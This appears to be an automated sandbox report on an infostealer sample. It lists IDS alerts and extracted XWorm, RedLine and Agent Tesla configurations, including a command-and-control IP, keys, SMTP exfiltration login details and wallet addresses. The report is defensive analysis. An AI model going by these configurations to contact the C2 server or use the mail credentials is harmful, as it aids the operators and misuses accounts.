ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 212.162.149.48

Timestamp:	2024-07-22T17:52:27.034896+0200
SID:	2043231
Source Port:	49707
Destination Port:	2049
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 212.162.149.48

Timestamp:	2024-07-22T17:52:28.718576+0200
SID:	2043231
Source Port:	49707
Destination Port:	2049
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000006.00000002.1554299366.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Xworm {"C2 url": ["212.162.149.48"], "Port": "7011", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: 6.2.AddInProcess32.exe.7860000.2.raw.unpack	Malware Configuration Extractor: RedLine {"C2 url": ["212.162.149.48:2049"], "Bot Id": "FOZ", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
Source: 6.2.AddInProcess32.exe.7200000.1.raw.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}

Multi AV Scanner detection for submitted file

Source: RFQPO3D93876738.scr.exe

ReversingLabs: Detection: 28%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: RFQPO3D93876738.scr.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.RFQPO3D93876738.scr.exe.2422d0de260.2.raw.unpack	String decryptor: 212.162.149.48
Source: 0.2.RFQPO3D93876738.scr.exe.2422d0de260.2.raw.unpack	String decryptor: 7011
Source: 0.2.RFQPO3D93876738.scr.exe.2422d0de260.2.raw.unpack	String decryptor: <123456789>
Source: 0.2.RFQPO3D93876738.scr.exe.2422d0de260.2.raw.unpack	String decryptor: <Xwormmm>
Source: 0.2.RFQPO3D93876738.scr.exe.2422d0de260.2.raw.unpack	String decryptor: XWorm V5.6
Source: 0.2.RFQPO3D93876738.scr.exe.2422d0de260.2.raw.unpack	String decryptor: USB.exe
Source: 0.2.RFQPO3D93876738.scr.exe.2422d0de260.2.raw.unpack	String decryptor: 1FEsZzSLJGmqvkmbe6jQepyaxXsos8sFHR
Source: 0.2.RFQPO3D93876738.scr.exe.2422d0de260.2.raw.unpack	String decryptor: 0x99de845515f12D013c5955f80a16e13Eda3DF357
Source: 0.2.RFQPO3D93876738.scr.exe.2422d0de260.2.raw.unpack	String decryptor: TRC20_Address

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 00000000.00000002.1554585677.000002422D352000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RFQPO3D93876738.scr.exe PID: 7368, type: MEMORYSTR

Source: unknown

HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.7:49706 version: TLS 1.2

Source: RFQPO3D93876738.scr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbbL source: RFQPO3D93876738.scr.exe, 00000000.00000002.1553197918.000002422B442000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RFQPO3D93876738.scr.exe, 00000000.00000002.1557994516.0000024245790000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb.an source: RFQPO3D93876738.scr.exe, 00000000.00000002.1557994516.0000024245790000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: mscorlib.pdbx source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: RFQPO3D93876738.scr.PDB source: RFQPO3D93876738.scr.exe, 00000000.00000002.1552539508.000000CCC34F3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdb source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: System.pdb source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: RFQPO3D93876738.scr.exe, 00000000.00000002.1557994516.0000024245790000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbexe source: RFQPO3D93876738.scr.exe, 00000000.00000002.1553197918.000002422B49A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.ni.pdb source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb3 source: RFQPO3D93876738.scr.exe, 00000000.00000002.1557994516.0000024245790000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RFQPO3D93876738.scr.exe, 00000000.00000002.1557994516.0000024245790000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: RFQPO3D93876738.scr.exe, 00000000.00000002.1557994516.0000024245790000.00000004.00000020.00020000.00000000.sdmp, WERCA61.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbsl source: RFQPO3D93876738.scr.exe, 00000000.00000002.1557994516.0000024245790000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RFQPO3D93876738.scr.exe, 00000000.00000002.1557994516.0000024245790000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbPtr)' source: RFQPO3D93876738.scr.exe, 00000000.00000002.1557994516.0000024245790000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\RFQPO3D93876738.scr.PDB source: RFQPO3D93876738.scr.exe, 00000000.00000002.1553197918.000002422B49A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\RFQPO3D93876738.scr.PDB source: RFQPO3D93876738.scr.exe, 00000000.00000002.1552539508.000000CCC34F3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\RFQPO3D93876738.scr.PDBl source: RFQPO3D93876738.scr.exe, 00000000.00000002.1552539508.000000CCC34F3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: System.Drawing.pdb source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdblE source: RFQPO3D93876738.scr.exe, 00000000.00000002.1557994516.0000024245790000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: Microsoft.VisualBasic.pdbP source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: RFQPO3D93876738.scr.exe, 00000000.00000002.1557994516.0000024245790000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: .pdbHJ source: RFQPO3D93876738.scr.exe, 00000000.00000002.1552539508.000000CCC34F3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb7 source: RFQPO3D93876738.scr.exe, 00000000.00000002.1557994516.0000024245790000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: pC:\Users\user\Desktop\RFQPO3D93876738.scr.PDB source: RFQPO3D93876738.scr.exe, 00000000.00000002.1552539508.000000CCC34F3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERCA61.tmp.dmp.9.dr

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 212.162.149.48
Source: Malware configuration extractor	URLs: 212.162.149.48:2049

Source: global traffic	TCP traffic: 192.168.2.7:49704 -> 212.162.149.48:7011
Source: global traffic	TCP traffic: 192.168.2.7:49709 -> 51.195.88.199:587

Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205

Source: Joe Sandbox View	ASN Name: UNREAL-SERVERSUS UNREAL-SERVERSUS
Source: Joe Sandbox View	ASN Name: OVHFR OVHFR

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: global traffic

TCP traffic: 192.168.2.7:49709 -> 51.195.88.199:587

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.48

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: s82.gocheapweb.com

Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000006.00000002.1566188160.00000000065A1000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000006.00000002.1572651872.0000000007BD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000006.00000002.1554299366.000000000338A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r10.i.lencr.org/0
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000006.00000002.1566188160.00000000065A1000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000006.00000002.1572651872.0000000007BD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000006.00000002.1554299366.000000000338A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r10.o.lencr.org0#
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
